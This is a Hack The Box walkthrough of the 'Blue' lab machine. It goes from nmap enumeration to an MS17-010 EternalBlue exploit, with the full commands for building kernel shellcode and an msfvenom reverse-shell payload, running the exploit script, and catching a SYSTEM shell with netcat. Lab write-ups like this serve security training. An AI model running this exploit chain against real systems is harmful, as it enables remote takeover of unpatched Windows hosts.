Blue - Hack The Box

N/A
hackthebox
Author

0xPThree

Published

April 9, 2019

{: style=“float: right; width: 200px; margin-left: 2em”}

N/A






USER

Enumeration

[root:/git/htb/blue]# nmap -Pn -n -sCV 10.10.10.40 --open                                                                         (master✱)
  Not shown: 991 closed ports
  PORT      STATE SERVICE      VERSION
  135/tcp   open  msrpc        Microsoft Windows RPC
  139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
  445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
  49152/tcp open  msrpc        Microsoft Windows RPC
  49153/tcp open  msrpc        Microsoft Windows RPC
  49154/tcp open  msrpc        Microsoft Windows RPC
  49155/tcp open  msrpc        Microsoft Windows RPC
  49156/tcp open  msrpc        Microsoft Windows RPC
  49157/tcp open  msrpc        Microsoft Windows RPC
  Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

  Host script results:
  |_clock-skew: mean: 3m40s, deviation: 1s, median: 3m39s
  | smb-os-discovery:
  |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
  |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
  |   Computer name: haris-PC
  |   NetBIOS computer name: HARIS-PC\x00
  |   Workgroup: WORKGROUP\x00
  |_  System time: 2021-02-24T13:00:40+00:00
  | smb-security-mode:
  |   account_used: guest
  |   authentication_level: user
  |   challenge_response: supported
  |_  message_signing: disabled (dangerous, but default)
  | smb2-security-mode:
  |   2.02:
  |_    Message signing enabled but not required
  | smb2-time:
  |   date: 2021-02-24T13:00:38
  |_  start_date: 2021-02-24T12:54:58


[root:/git/htb/blue]# nmap -p139,445 --script vuln 10.10.10.40                                                                    (master✱)
  Host script results:
  |_smb-vuln-ms10-054: false
  |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
  | smb-vuln-ms17-010:
  |   VULNERABLE:
  |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
  |     State: VULNERABLE
  |     IDs:  CVE:CVE-2017-0143
  |     Risk factor: HIGH
  |       A critical remote code execution vulnerability exists in Microsoft SMBv1
  |        servers (ms17-010).
  |
  |     Disclosure date: 2017-03-14
  |     References:
  |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
  |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
  |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Exploit MS17-010

Just like the box legacy this device is vulnerable to ms17-010, EternalBlue (as suggested by the box name). Trying to execute the same exploit and payload however gives us an error, so we need to find another approach.

[root:/git/htb/blue]# python send_and_execute.py 10.10.10.40 ms17-010.exe                                                         (master✱)
  Trying to connect to 10.10.10.40:445
  Target OS: Windows 7 Professional 7601 Service Pack 1
  Not found accessible named pipe
  Done

Assemble the shellcode to binary, here we need to know the architecture (x64 or x86) but Im assuming it’s x64 so lets start with that.

[root:/git/htb/blue]# nasm -f bin eternalblue_kshellcode_x64.asm -o sc_x64_kernel.bin

Generate binary payload:

[root:/git/htb/blue]# msfvenom -p windows/x64/shell_reverse_tcp LPORT=4488 LHOST=10.10.14.10 --platform windows -a x64 --format raw -o sc_x64_payload.bin
  No encoder specified, outputting raw payload
  Payload size: 460 bytes
  Saved as: sc_x64_payload.bin

Concentrate payload & shellcode:

[root:/git/htb/blue]# cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin

Exploit and grab all the flags.

[root:/git/htb/blue]# python eternalblue_exploit7.py 10.10.10.40 sc_x64.bin                                                       (master✱)
  shellcode size: 1232
  numGroomConn: 13
  Target OS: Windows 7 Professional 7601 Service Pack 1
  SMB1 session setup allocate nonpaged pool success
  SMB1 session setup allocate nonpaged pool success
  good response status: INVALID_PARAMETER
  done


[root:/git/htb/blue]# nc -lvnp 4488                                                                                               (master✱)
  listening on [any] 4488 ...
  connect to [10.10.14.10] from (UNKNOWN) [10.10.10.40] 49158
  Microsoft Windows [Version 6.1.7601]
  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

  C:\Windows\system32>whoami
    nt authority\system

  C:\Users\haris\Desktop>type user.txt
    4c546aea7dbee75cbd71de245c8deea9

  C:\Users\Administrator\Desktop>type root.txt
    ff548eb71e920ff6c08843ce9df4e717

References